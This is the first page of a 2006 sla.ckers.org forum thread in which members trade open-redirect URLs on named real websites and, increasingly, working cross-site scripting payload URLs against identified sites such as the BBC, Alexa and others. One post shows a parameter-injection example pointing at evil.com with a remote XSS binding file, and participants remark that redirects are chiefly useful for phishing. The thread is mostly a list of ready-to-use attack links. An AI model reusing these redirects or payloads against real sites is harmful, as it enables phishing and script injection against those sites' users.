Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 1234567891011Next
Current Page: 1 of 11
So it begins - Redirects Edition
Posted by: maluc
Date: September 12, 2006 04:52AM

Post your redirects here.. i'll start it off

just keeping your eye open for an http:// link as a parameter for a page (i.e. http:/example.com/content.php?blah=50&url=http:/www.imaredirectlink.com&p=6) is the easiest way to come across them..

that being said, i've never been to this site before, nor since >.>
http://www.sexocean.com/cgi-bin/tt.cgi?cmd=out&url=http://sla.ckers.org/forum/profile.php?1,50 lol..

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 12, 2006 05:02AM

nor these:
**virtualtgp.com removed** - doesn't redirect 100% of the time to the site you specify
http://www.onlyteenstgp.com/cgi-bin/tt.cgi?cmd=out&url=http://www.disney.com
http://www.easypic.com/cgi-bin/rb4/cout.cgi?url=http://www.disney.com
http://www.sexvalley.net/o.php?url=http://www.disney.com
http://www.pussy.org/cgi-bin/ucj/c.cgi?url=http://www.disney.com

dripping with irony..

-maluc



Edited 4 time(s). Last edit at 09/13/2006 12:38AM by maluc.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 12, 2006 06:05AM

http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=924891&HTML=http://sla.ckers.org/forum/profile.php?1,50

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 12, 2006 12:12PM

hahah, I love it. Walt would be proud.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 13, 2006 12:25AM

heh, a word of caution with those though .. i only tested them about 5 times each cause im lazy ..

So, if one in ten redirects takes you to pron advertisement instead, don't say i didn't warn ya :x

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 13, 2006 10:47AM

Oh my eyes, my virgin eyes! http://fu.ckers.org/goatse.html

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: id
Date: September 13, 2006 12:00PM

please add anal.fu.ckers.org to dns if you are going to show that, thanks!

-id

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 13, 2006 01:57PM

We already have fudge.pa.ckers.org

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 13, 2006 01:58PM

And a butt.fu.ckers.org too!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: WhiteAcid
Date: September 16, 2006 09:52AM

http://fpad.filefront.com/?http://www.google.com

Better yet remove the querystring and you're left with an infitite loop.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 16, 2006 10:47AM

hrm, the first time you try that one, it goes to an advertisement page .. unless you have the cookie set: sawAd = "true"..

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 16, 2006 11:55AM

You could use the Flash header spoofing to set the cookie, or send the user to a page with an iframe to the redirector and then wait a few seconds and send them through the redirector. Either way that doesn't seem great as you can't just send someone to the URL to obfuscate yours (you still need to control some other site to make that work).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 17, 2006 01:20PM

http://www.propsmart.com/homes-for-sale/US/MA/%22onmouseover=%22alert('XSS')%22a=%22

Then mouse over the links in the header or the left search boxes to get the JS to fire.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: merliin
Date: September 19, 2006 03:26PM

Googledork:
inurl:"url=http://"

Showing results 1-10 of about 10,400,000

MERLiiN
http://www.nastynerds.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 19, 2006 03:51PM

I don't think that would work actually... what you are finding is sites that have that in the URL, not sites that do redirection. You'd think they'd be correlated, but the spider doesn't index 301 pages. It was a good thought though, maybe there's something else there.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 19, 2006 04:48PM

http://redirect.alexa.com/redirect?%0AContent-type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

This is three things, XSS, response splitting and redirection.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 19, 2006 04:53PM

Yeah i tried that myself too, about all i could find were the click-through ones .. where it loads the page with advertisements and sends you to the url=___ after clicking

I didn't spend much time inspecting them though, but some of them might be vulnerable to parameter insertion: i.e.
url=http://evil.com" style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: raif
Date: September 19, 2006 07:28PM

http://www.sothebysrealty.com/PageRedirect.aspx?url=http://www.disney.com

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 19, 2006 08:06PM

well since we're on the subject of disney linking..

Click Here Kids: http://transfer.go.com/cgi/transfer.dll?srvc=dis&goto=http://%70%6C%61%79%62%6F%79.com/&name=g_micChrome_dlogo

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: September 19, 2006 08:27PM

just a random one ..
http://www.internetaccessmonitor.com/bitrix/redirect.php?goto=http://%6D%61%6C%75%63%2E%73%69%74%65%73%6C%65%64.com

however, i don't really know of any use for redirects other than the phishing game, and possibly just ghetto referer masking .. thus for no name sites like this, is there any use in them?

insight wanted.. _-_

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 19, 2006 11:49PM

Well, if they are vulnerable to response splitting you get the side advantage of also getting some XSS out of it, but you're essentially right. Redirection is mostly for phishing, and mostly it's not good even for referrer masking as most browsers keep the referrer through 301 redirection of the original page, not the page that does the redirection itself.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: WhiteAcid
Date: September 21, 2006 06:22PM

http://www.darkreading.com/reg_logout.asp?nexturl=http://www.google.com&webinarID=28032
Most likely fixed very soon.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Kyran
Date: September 21, 2006 06:31PM

Darkreading is just getting your full force, isn't it WhiteAcid?

- Kyran

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: WhiteAcid
Date: September 21, 2006 06:40PM

I like abusing sites that should know better.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 21, 2006 07:45PM

It is pretty amazing how fast they've been taking these down though. Props to them! They're really on it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: WhiteAcid
Date: September 21, 2006 07:57PM

Well.. that last one in the comments and the 3-4 in my email plus the redirect one haven't yet been fixed. Still... much better than most sites, and I guess their sysadmins have to sleep at some point.

Edit: http://www.tescofinance.com/personal/finance/entrypage_index.jsp?url=http://www.google.com&referrerid=tesco

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 08:27PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 21, 2006 09:45PM

Had to jump out of title tags here and they try to escape single and double quotes. Alas....

http://vampirefreaks.com/gallery.php?u=%3C/title%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&folder_id=5225

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: September 21, 2006 09:54PM

Anyone want to make their own articles? http://www.bbc.co.uk/cgi-bin/navigation/mailto.pl?from=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&subject=&body=&x=66&y=15&REFERER=http%3A%2F%2Fwww.bbc.co.uk%2Fmobile%2Fweb%2Findex.shtml

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: WhiteAcid
Date: September 21, 2006 10:06PM

Nice find. I had one on BT the other day but didn't keep a note and lost it. Also, their site is the only site I've seen which explicitly states that some input is not allowed as it's commonly used in a cross site scripting attack, but now I can't find that either.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Kyran
Date: September 21, 2006 10:13PM

Isn't this Redirects edition?

Go to sleep rsnake. You must be tired.

- Kyran

Options: ReplyQuote
Pages: 1234567891011Next
Current Page: 1 of 11


Sorry, only registered users may post in this forum.